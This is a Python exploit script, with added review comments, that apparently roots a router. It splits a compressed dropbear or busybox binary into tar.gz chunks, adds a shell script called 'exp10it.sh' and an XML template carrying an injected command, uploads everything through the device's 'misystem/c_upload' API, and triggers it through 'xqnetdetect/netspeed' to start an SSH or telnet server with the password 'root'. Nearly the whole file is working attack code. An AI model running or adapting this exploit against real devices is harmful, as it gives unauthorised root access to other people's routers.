#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Builds a set of small .tar.gz archives holding a gzip-compressed binary
# (dropbearmulti or busybox, chosen by `use_ssh`) plus a shell script and an
# XML template, uploads them to the device through gw.apiurl, then pings the
# device via the gateway helper.  The script is straight-line: every step is
# a side effect (files under tmp/, HTTP requests, gateway state), so statement
# order matters throughout.
#
# Artifacts that identify a run of this script (all taken from the code
# below): local files under tmp/ named <binary>_<n>, payload_<n>.tar.gz and
# speedtest_urls.xml; archive members exp10it.sh, speedtest_urls.xml and,
# with SSH, dropbear.uci.cfg / dropbear.init.d.sh; HTTP POSTs to
# misystem/c_upload followed by a GET to xqnetdetect/netspeed.

import os
import sys
import re
import time
import random
import hashlib
import requests
import socket
import tarfile
import gzip

# NOTE(review): sys, re, random, hashlib and socket are not referenced
# anywhere in this file.
import xmir_base
from gateway import *


# Project helper (gateway module, star-imported).  The keyword names suggest
# it aborts when SSH on port 122 already answers and tolerates FTP being up;
# confirm against gateway.create_gateway before relying on that.
gw = create_gateway(ssh_port = 122, die_if_sshOk = True, die_if_ftpOk = False)

dn = gw.device_name  # device model string, used only to pick the binary's arch

# True: ship dropbearmulti from data/payload_ssh/ and expect SSH afterwards.
# False: ship busybox from data/payload/ and expect TELNET/FTP instead.
use_ssh = True

dn_tmp = 'tmp/'  # scratch directory; note the trailing slash (see fn_pf below)

if use_ssh:
    dn_dir = 'data/payload_ssh/'
else:
    dn_dir = 'data/payload/'

print("Begin creating a payload for the exploit...")

if use_ssh:
    fn_pfname = 'dropbearmulti'
else:
    fn_pfname = 'busybox'

# Filename templates; '{num}' is filled in per chunk later.
# NOTE(review): dn_tmp already ends in '/', so these expand to 'tmp//...'.
# That is harmless on POSIX but inconsistent with the `dn_tmp + fn_executor`
# spelling used further down.
fn_pf = f'{dn_tmp}/{fn_pfname}' + '_{num}'
fn_payload = f'{dn_tmp}/payload' + '_{num}.tar.gz'

# Pick the prebuilt binary by target architecture: MIPS is the default,
# R3D/D01 get the ARMv7-A build and RB03 the ARM64 build.
fn_suffix = '_mips'
if dn == 'R3D' or dn == 'D01':
    fn_suffix = '_armv7a'
if dn == "RB03":
    fn_suffix = '_arm64'

fn_pf_orig = dn_dir + fn_pfname + fn_suffix

# Remove leftovers from a previous run so stale chunks cannot be packed.
for num in range(0, 9):
    fn = fn_payload.format(num = num)
    os.remove(fn) if os.path.exists(fn) else None
    fn = fn_pf.format(num = num)
    os.remove(fn) if os.path.exists(fn) else None

# The binary is gzip-compressed once here; the chunks below are slices of
# the compressed stream, and each chunk is compressed again by tarfile.
with open(fn_pf_orig, "rb") as file:
    pf = file.read()
    pf = gzip.compress(pf, compresslevel = 9)

max_payload_size = 100*1024  # upper bound checked against each .tar.gz below
max_chunk_size = 90*1024     # bytes of `pf` written into each chunk file

FN_pf = [ ]       # chunk files written under tmp/
FN_payload = [ ]  # matching .tar.gz names, one per chunk
for num in range(0, 9):
    pos = num * max_chunk_size
    chunk = pf[pos:pos+max_chunk_size]
    if not chunk:
        break
    fn = fn_pf.format(num = num)
    with open(fn, "wb") as file:
        file.write(chunk)
    FN_pf.append(fn)
    FN_payload.append(fn_payload.format(num = num))
# NOTE(review): the loop stops after 9 chunks without checking that all of
# `pf` was consumed; a compressed binary larger than 9 * max_chunk_size
# would be silently truncated.

if len(FN_pf) < 1:
    raise RuntimeError('len(FN_pf) < 1')

fn_exploit = "exp10it.sh"
command = f"sh /tmp/{fn_exploit}"  # substituted into the XML template below

# Fill the XML template with the device address and the command, writing it
# with LF line endings regardless of host platform.
fn_executor = "speedtest_urls.xml"
with open(dn_dir + fn_executor, "rt", encoding = "UTF-8") as file:
    template = file.read()

data = template.format(router_ip_address=gw.ip_addr, command=command)
with open(dn_tmp + fn_executor, "wt", encoding = "UTF-8", newline = "\n") as file:
    file.write(data)

# One archive per chunk; only the last archive also carries the XML, the
# shell script and (with SSH) the dropbear config/init files.
# NOTE(review): the loop variable `fn_pf` shadows the template string of the
# same name defined above; the template is not used again, so no harm, but
# a distinct name would read better.
for num, fn_pf in enumerate(FN_pf):
    with tarfile.open(FN_payload[num], "w:gz", compresslevel=9) as tar:
        tar.add(fn_pf, arcname = os.path.basename(fn_pf))
        if num == len(FN_pf) - 1:
            tar.add(dn_tmp + fn_executor, arcname = fn_executor)
            tar.add(dn_dir + fn_exploit, arcname = fn_exploit)
            if use_ssh:
                tar.add(dn_dir + 'dropbear.uci.cfg', arcname = 'dropbear.uci.cfg')
                tar.add(dn_dir + 'dropbear.init.d.sh', arcname = 'dropbear.init.d.sh')

# Drop the raw chunk files and enforce the size limit on each archive, with a
# 128-byte margin below max_payload_size.  `die` comes from the star import.
for num, fn_pf in enumerate(FN_pf):
    os.remove(fn_pf) if os.path.exists(fn_pf) else None
    tgz_size = os.path.getsize(FN_payload[num])
    if tgz_size > max_payload_size - 128:
        die(f'File size "{FN_payload[num]}" exceeds 100KiB')

print("Start uploading the exploit with payload...")

# NOTE(review): the file object passed via `files=` is never closed, so one
# handle per archive leaks until interpreter exit; the request also has no
# timeout and its HTTP status is not checked, so a failed upload goes
# unnoticed here.  (`fn_payload` shadows the template string, as above.)
for num, fn_payload in enumerate(FN_payload):
    requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload, 'rb')})

time.sleep(1)

# Tell the gateway helper which service to expect on the device afterwards.
if use_ssh:
    print(f"Running SSH server on port {gw.ssh_port}...")
    gw.use_ssh = True
else:
    print("Running TELNET and FTP servers...")
    gw.use_ftp = True

# Issued once after all uploads; the response is ignored and no timeout is set.
requests.get(gw.apiurl + "xqnetdetect/netspeed")

time.sleep(0.5)
gw.passw = 'root'
gw.ping(contimeout = 27)  # presumably waits up to 27 s for an answer; confirm in gateway.py

print("")
print(f"#### Connection to device {gw.device_name} is OK ####")